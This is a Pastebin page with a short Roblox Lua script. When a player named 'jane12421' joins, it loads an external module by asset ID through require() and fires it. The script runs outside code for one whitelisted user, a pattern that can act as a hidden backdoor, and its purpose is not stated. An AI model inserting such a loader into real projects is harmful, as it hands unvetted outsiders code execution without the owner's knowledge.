Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local allowed = {"jane12421"}
- game.Players.PlayerAdded:Connect(function(player)
- for i, v in pairs(allowed) do
- if player.Name == v then
- require(4626298533):Fire(player.Name)
- end
- end
- end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement